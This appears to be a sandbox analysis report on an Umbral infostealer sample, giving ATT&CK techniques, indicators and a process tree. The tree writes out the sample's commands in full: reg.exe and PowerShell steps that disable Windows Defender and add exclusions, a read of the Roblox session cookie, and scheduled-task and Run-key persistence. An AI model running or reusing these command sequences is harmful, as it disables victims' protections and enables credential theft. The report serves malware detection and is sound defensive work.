umbral | 98ffd90c72e22b5ce1783eeeebc424702e45398a7be1f3f9343beb7c87fc7977

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FunChecker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Microsoft OneDrive.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	system32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2908	powershell.exe
3812	powershell.exe
1088	powershell.exe
4208	powershell.exe
428	powershell.exe
4944	powershell.exe
944	powershell.exe
2324	powershell.exe
3996	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	svchost.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Microsoft OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Microsoft OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	system32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	system32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FunChecker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FunChecker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk	system32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunChecker.lnk	Microsoft OneDrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunChecker.lnk	Microsoft OneDrive.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk	system32.exe

Executes dropped EXE 3 IoCs

pid	Process
4528	svchost.exe
4200	Microsoft OneDrive.exe
2988	system32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 14 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/4900-12-0x0000000000400000-0x0000000001704000-memory.dmp	themida
behavioral1/memory/4900-13-0x0000000000400000-0x0000000001704000-memory.dmp	themida
behavioral1/files/0x000800000001ac40-24.dat	themida
behavioral1/files/0x000800000001ac41-29.dat	themida
behavioral1/files/0x000800000001ac43-40.dat	themida
behavioral1/memory/4528-44-0x0000000000400000-0x0000000000D68000-memory.dmp	themida
behavioral1/memory/4528-45-0x0000000000400000-0x0000000000D68000-memory.dmp	themida
behavioral1/memory/4200-47-0x0000000000400000-0x0000000000D22000-memory.dmp	themida
behavioral1/memory/4200-48-0x0000000000400000-0x0000000000D22000-memory.dmp	themida
behavioral1/memory/2988-51-0x0000000000400000-0x0000000000CE0000-memory.dmp	themida
behavioral1/memory/2988-52-0x0000000000400000-0x0000000000CE0000-memory.dmp	themida
behavioral1/memory/4528-1610-0x0000000000400000-0x0000000000D68000-memory.dmp	themida
behavioral1/memory/4900-2326-0x0000000000400000-0x0000000001704000-memory.dmp	themida
behavioral1/memory/4200-2335-0x0000000000400000-0x0000000000D22000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\FunChecker = "C:\\Users\\Admin\\AppData\\Roaming\\FunChecker.exe"	Microsoft OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft OneDrive"	system32.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	FunChecker.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	svchost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Microsoft OneDrive.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	system32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	discord.com
14	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com
11	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4900	FunChecker.exe
4528	svchost.exe
4200	Microsoft OneDrive.exe
2988	system32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3608	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
4192	wmic.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4296	schtasks.exe
2716	schtasks.exe

Suspicious behavior: EnumeratesProcesses 49 IoCs

pid	Process
4900	FunChecker.exe
4900	FunChecker.exe
4528	svchost.exe
4528	svchost.exe
4200	Microsoft OneDrive.exe
4200	Microsoft OneDrive.exe
2988	system32.exe
2988	system32.exe
1088	powershell.exe
1088	powershell.exe
1088	powershell.exe
3952	powershell.exe
3952	powershell.exe
3952	powershell.exe
872	powershell.exe
872	powershell.exe
872	powershell.exe
4208	powershell.exe
428	powershell.exe
436	powershell.exe
428	powershell.exe
4208	powershell.exe
428	powershell.exe
436	powershell.exe
4208	powershell.exe
436	powershell.exe
944	powershell.exe
944	powershell.exe
2908	powershell.exe
944	powershell.exe
2908	powershell.exe
2908	powershell.exe
212	powershell.exe
212	powershell.exe
212	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
3996	powershell.exe
3996	powershell.exe
3996	powershell.exe
3812	powershell.exe
3812	powershell.exe
3812	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4200	Microsoft OneDrive.exe
2988	system32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4528	svchost.exe
Token: SeDebugPrivilege	4200	Microsoft OneDrive.exe
Token: SeDebugPrivilege	2988	system32.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	428	powershell.exe
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeIncreaseQuotaPrivilege	1088	wmic.exe
Token: SeSecurityPrivilege	1088	wmic.exe
Token: SeTakeOwnershipPrivilege	1088	wmic.exe
Token: SeLoadDriverPrivilege	1088	wmic.exe
Token: SeSystemProfilePrivilege	1088	wmic.exe
Token: SeSystemtimePrivilege	1088	wmic.exe
Token: SeProfSingleProcessPrivilege	1088	wmic.exe
Token: SeIncBasePriorityPrivilege	1088	wmic.exe
Token: SeCreatePagefilePrivilege	1088	wmic.exe
Token: SeBackupPrivilege	1088	wmic.exe
Token: SeRestorePrivilege	1088	wmic.exe
Token: SeShutdownPrivilege	1088	wmic.exe
Token: SeDebugPrivilege	1088	wmic.exe
Token: SeSystemEnvironmentPrivilege	1088	wmic.exe
Token: SeRemoteShutdownPrivilege	1088	wmic.exe
Token: SeUndockPrivilege	1088	wmic.exe
Token: SeManageVolumePrivilege	1088	wmic.exe
Token: 33	1088	wmic.exe
Token: 34	1088	wmic.exe
Token: 35	1088	wmic.exe
Token: 36	1088	wmic.exe
Token: SeIncreaseQuotaPrivilege	1088	wmic.exe
Token: SeSecurityPrivilege	1088	wmic.exe
Token: SeTakeOwnershipPrivilege	1088	wmic.exe
Token: SeLoadDriverPrivilege	1088	wmic.exe
Token: SeSystemProfilePrivilege	1088	wmic.exe
Token: SeSystemtimePrivilege	1088	wmic.exe
Token: SeProfSingleProcessPrivilege	1088	wmic.exe
Token: SeIncBasePriorityPrivilege	1088	wmic.exe
Token: SeCreatePagefilePrivilege	1088	wmic.exe
Token: SeBackupPrivilege	1088	wmic.exe
Token: SeRestorePrivilege	1088	wmic.exe
Token: SeShutdownPrivilege	1088	wmic.exe
Token: SeDebugPrivilege	1088	wmic.exe
Token: SeSystemEnvironmentPrivilege	1088	wmic.exe
Token: SeRemoteShutdownPrivilege	1088	wmic.exe
Token: SeUndockPrivilege	1088	wmic.exe
Token: SeManageVolumePrivilege	1088	wmic.exe
Token: 33	1088	wmic.exe
Token: 34	1088	wmic.exe
Token: 35	1088	wmic.exe
Token: 36	1088	wmic.exe
Token: SeIncreaseQuotaPrivilege	4744	wmic.exe
Token: SeSecurityPrivilege	4744	wmic.exe
Token: SeTakeOwnershipPrivilege	4744	wmic.exe
Token: SeLoadDriverPrivilege	4744	wmic.exe
Token: SeSystemProfilePrivilege	4744	wmic.exe
Token: SeSystemtimePrivilege	4744	wmic.exe
Token: SeProfSingleProcessPrivilege	4744	wmic.exe
Token: SeIncBasePriorityPrivilege	4744	wmic.exe
Token: SeCreatePagefilePrivilege	4744	wmic.exe
Token: SeBackupPrivilege	4744	wmic.exe
Token: SeRestorePrivilege	4744	wmic.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4200	Microsoft OneDrive.exe
2988	system32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4900 wrote to memory of 4800	4900	FunChecker.exe	73
PID 4900 wrote to memory of 4800	4900	FunChecker.exe	73
PID 4900 wrote to memory of 4800	4900	FunChecker.exe	73
PID 4800 wrote to memory of 864	4800	cmd.exe	76
PID 4800 wrote to memory of 864	4800	cmd.exe	76
PID 4800 wrote to memory of 864	4800	cmd.exe	76
PID 4900 wrote to memory of 4528	4900	FunChecker.exe	75
PID 4900 wrote to memory of 4528	4900	FunChecker.exe	75
PID 4900 wrote to memory of 4528	4900	FunChecker.exe	75
PID 4900 wrote to memory of 4200	4900	FunChecker.exe	77
PID 4900 wrote to memory of 4200	4900	FunChecker.exe	77
PID 4900 wrote to memory of 4200	4900	FunChecker.exe	77
PID 4900 wrote to memory of 2988	4900	FunChecker.exe	78
PID 4900 wrote to memory of 2988	4900	FunChecker.exe	78
PID 4900 wrote to memory of 2988	4900	FunChecker.exe	78
PID 4900 wrote to memory of 652	4900	FunChecker.exe	79
PID 4900 wrote to memory of 652	4900	FunChecker.exe	79
PID 4900 wrote to memory of 652	4900	FunChecker.exe	79
PID 4800 wrote to memory of 4560	4800	cmd.exe	81
PID 4800 wrote to memory of 4560	4800	cmd.exe	81
PID 4800 wrote to memory of 4560	4800	cmd.exe	81
PID 652 wrote to memory of 496	652	cmd.exe	82
PID 652 wrote to memory of 496	652	cmd.exe	82
PID 652 wrote to memory of 496	652	cmd.exe	82
PID 4800 wrote to memory of 3288	4800	cmd.exe	83
PID 4800 wrote to memory of 3288	4800	cmd.exe	83
PID 4800 wrote to memory of 3288	4800	cmd.exe	83
PID 4800 wrote to memory of 5052	4800	cmd.exe	84
PID 4800 wrote to memory of 5052	4800	cmd.exe	84
PID 4800 wrote to memory of 5052	4800	cmd.exe	84
PID 4800 wrote to memory of 5088	4800	cmd.exe	85
PID 4800 wrote to memory of 5088	4800	cmd.exe	85
PID 4800 wrote to memory of 5088	4800	cmd.exe	85
PID 4800 wrote to memory of 5056	4800	cmd.exe	86
PID 4800 wrote to memory of 5056	4800	cmd.exe	86
PID 4800 wrote to memory of 5056	4800	cmd.exe	86
PID 4800 wrote to memory of 5096	4800	cmd.exe	87
PID 4800 wrote to memory of 5096	4800	cmd.exe	87
PID 4800 wrote to memory of 5096	4800	cmd.exe	87
PID 4800 wrote to memory of 3680	4800	cmd.exe	88
PID 4800 wrote to memory of 3680	4800	cmd.exe	88
PID 4800 wrote to memory of 3680	4800	cmd.exe	88
PID 4800 wrote to memory of 4936	4800	cmd.exe	89
PID 4800 wrote to memory of 4936	4800	cmd.exe	89
PID 4800 wrote to memory of 4936	4800	cmd.exe	89
PID 4800 wrote to memory of 5116	4800	cmd.exe	90
PID 4800 wrote to memory of 5116	4800	cmd.exe	90
PID 4800 wrote to memory of 5116	4800	cmd.exe	90
PID 4800 wrote to memory of 4084	4800	cmd.exe	91
PID 4800 wrote to memory of 4084	4800	cmd.exe	91
PID 4800 wrote to memory of 4084	4800	cmd.exe	91
PID 4800 wrote to memory of 2912	4800	cmd.exe	92
PID 4800 wrote to memory of 2912	4800	cmd.exe	92
PID 4800 wrote to memory of 2912	4800	cmd.exe	92
PID 4800 wrote to memory of 2488	4800	cmd.exe	93
PID 4800 wrote to memory of 2488	4800	cmd.exe	93
PID 4800 wrote to memory of 2488	4800	cmd.exe	93
PID 4800 wrote to memory of 4204	4800	cmd.exe	94
PID 4800 wrote to memory of 4204	4800	cmd.exe	94
PID 4800 wrote to memory of 4204	4800	cmd.exe	94
PID 4800 wrote to memory of 4196	4800	cmd.exe	95
PID 4800 wrote to memory of 4196	4800	cmd.exe	95
PID 4800 wrote to memory of 4196	4800	cmd.exe	95
PID 4800 wrote to memory of 4704	4800	cmd.exe	96

C:\Users\Admin\AppData\Local\Temp\FunChecker.exe
"C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4800
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:864
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5088
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5056
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5096
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3680
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4936
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:4084
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - Modifies registry class
    PID:4316
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - Modifies registry class
    PID:5016
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - Modifies registry class
    PID:868
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:4860
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4528
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3952
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:872
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:436
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4744
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:212
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4192
- C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe
  "C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:4200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:428
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunChecker.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunChecker.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3812
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunChecker" /tr "C:\Users\Admin\AppData\Roaming\FunChecker.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4296
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /delete /f /tn "FunChecker"
    3⤵
    PID:660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp25A4.tmp.bat""
    3⤵
    PID:192
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3608
- C:\Users\Admin\AppData\Local\Temp\system32.exe
  "C:\Users\Admin\AppData\Local\Temp\system32.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2988
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
